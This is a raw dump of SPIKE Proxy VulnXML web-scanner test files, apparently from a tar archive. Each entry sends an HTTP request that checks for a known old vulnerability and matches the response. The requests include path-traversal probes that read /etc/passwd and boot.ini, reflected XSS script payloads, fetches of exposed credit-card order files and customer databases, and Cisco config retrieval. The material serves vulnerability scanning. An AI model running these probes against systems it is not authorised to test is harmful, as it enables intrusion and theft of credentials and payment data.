(.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-653.xml0100664000076500007650000000715207566204543017567 0ustar davedave (metacart.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /database/metacart.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-654.xml0100664000076500007650000000722307566204543017567 0ustar davedave (auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dc/auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-655.xml0100664000076500007650000000720007566204543017563 0ustar davedave (orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dc/orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-656.xml0100664000076500007650000000734507566204543017576 0ustar davedave (dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00) "This install of DCForum allows attackers to read arbitrary files on the host." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-657.xml0100664000076500007650000000722707566204543017576 0ustar davedave (auth_user_file.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dcshop/auth_data/auth_user_file.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-658.xml0100664000076500007650000000720407566204543017572 0ustar davedave (orders.txt) "The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /dcshop/orders/orders.txt HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-659.xml0100664000076500007650000000717307566204543017600 0ustar davedave (globals.jsa) "Oracle 9iAS allows .jsa files to be retrieved 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /demo/ojspext/events/globals.jsa HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ event\:application_OnStart 200 event\:application_OnStart 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-65.xml0100664000076500007650000000706607566204543017510 0ustar davedave (test.php) "PHP is installed 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Current PHP version 200 Current PHP version 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-660.xml0100664000076500007650000000714707566204543017571 0ustar davedave (index.jsp) "This default may allow connectivity to the Oracle databases." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /demo/sql/index.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ JSP SQL Samples 200 JSP SQL Samples 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-661.xml0100664000076500007650000000705507566204543017570 0ustar davedave (/) "The /doc directory is browsable. This may be /usr/doc." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /doc/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-662.xml0100664000076500007650000000714507566204543017571 0ustar davedave (/) "This directory may show attackers all the packages installed on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /doc/packages/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of /doc 200 index of /doc 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-663.xml0100664000076500007650000000725107566204543017570 0ustar davedave (showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini) "Gafware's CFXImage allows remote users to view any file on the system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-664.xml0100664000076500007650000000753607566204543017577 0ustar davedave (500error.jsp?et=1<script>alert('Vulnerable')</script>;) "Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-665.xml0100664000076500007650000000714307566204543017572 0ustar davedave (passwd) "An '/etc/passwd' file is available through the web site. This may not be good at all." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-666.xml0100664000076500007650000000721007566204543017566 0ustar davedave (architext_query.pl) "Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ews/ews/architext_query.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-667.xml0100664000076500007650000000727307566204543017600 0ustar davedave (HelloServlet) "Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /examples/basic/servlet/HelloServlet HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The source of this servlet is in 200 The source of this servlet is in 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-668.xml0100664000076500007650000000715407566204543017577 0ustar davedave (cr) "The Cisco router's web install allows arbitrary commands to be executed remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /exec/show/config/cr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ ip address 200 ip address 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-669.xml0100664000076500007650000000751107566204543017575 0ustar davedave (echo.exe?foo=<script>alert('Vulnerable')</script>) "Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-66.xml0100664000076500007650000000722307566204543017504 0ustar davedave (main_menu.pl) "The NetDetector allows unauthenticated users to perform database queries." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/main_menu.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ NetDetector Traffic Analysis 200 NetDetector Traffic Analysis 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-670.xml0100664000076500007650000000751307566204543017567 0ustar davedave (echo2.exe?foo=<script>alert('Vulnerable')</script>) "Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-671.xml0100664000076500007650000000731507566204543017570 0ustar davedave (filemanager_forms.php) "Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /filemanager/filemanager_forms.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-672.xml0100664000076500007650000000744207566204543017572 0ustar davedave (bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK) "The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-673.xml0100664000076500007650000000713607566204543017573 0ustar davedave (shop.mdb) "MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /fpdb/shop.mdb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-674.xml0100664000076500007650000000727107566204543017574 0ustar davedave (GWWEB.EXE?HELP=bad-request) "Groupwise allows system information and file retrieval by modifying arguments to the help system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /GW5/GWWEB.EXE?HELP=bad-request HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Could not find file SYS 200 Could not find file SYS 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-675.xml0100664000076500007650000000743607566204543017600 0ustar davedave (cgicso?query=<script>alert('Vulnerable')</script>) "This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-676.xml0100664000076500007650000000724207566204543017574 0ustar davedave (cgicso?query=AAA) "This CGI allows attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /html/cgi-bin/cgicso?query=AAA HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 400 Required field missing\: fingerhost 200 400 Required field missing\: fingerhost 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-677.xml0100664000076500007650000000730007566204543017570 0ustar davedave (message.php) "Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /instantwebmail/message.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-678.xml0100664000076500007650000000740507566204543017577 0ustar davedave (FtpSave.dll?I'm%20Here) "Multiple files in the Interscan management server allow attackers to change settins without auth. Upgrade to the latest version of the Interscan product." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /interscan/cgi-bin/FtpSave.dll?I'm%20Here HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ These settings have been saved 200 These settings have been saved 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-679.xml0100664000076500007650000000731107566204543017574 0ustar davedave (viewsource.jsp?source=../../../../../../../../../../boot.ini) "Default JRun CGI lets users read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-67.xml0100664000076500007650000000723207566204543017505 0ustar davedave (printenv) "Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /cgi-bin/printenv HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ DOCUMENT_ROOT 200 DOCUMENT_ROOT 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-680.xml0100664000076500007650000000730307566204543017565 0ustar davedave (viewsource.jsp?source=../../../../../../../../../../etc/passwd) "Default JRun CGI lets users read any system file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-681.xml0100664000076500007650000000705607566204543017573 0ustar davedave (/) "Default Oracle JSP documentation." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jspdocs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ OracleJSP 200 OracleJSP 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-682.xml0100664000076500007650000000707107566204543017571 0ustar davedave (show%20conf) "Retrieved Cisco configuration file." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /level/42/exec/show%20conf HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-683.xml0100664000076500007650000000702407566204543017570 0ustar davedave (/) "Ahh...log information...fun!" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-684.xml0100664000076500007650000000704107566204543017570 0ustar davedave (access_log) "Just found this log..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /logs/access_log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 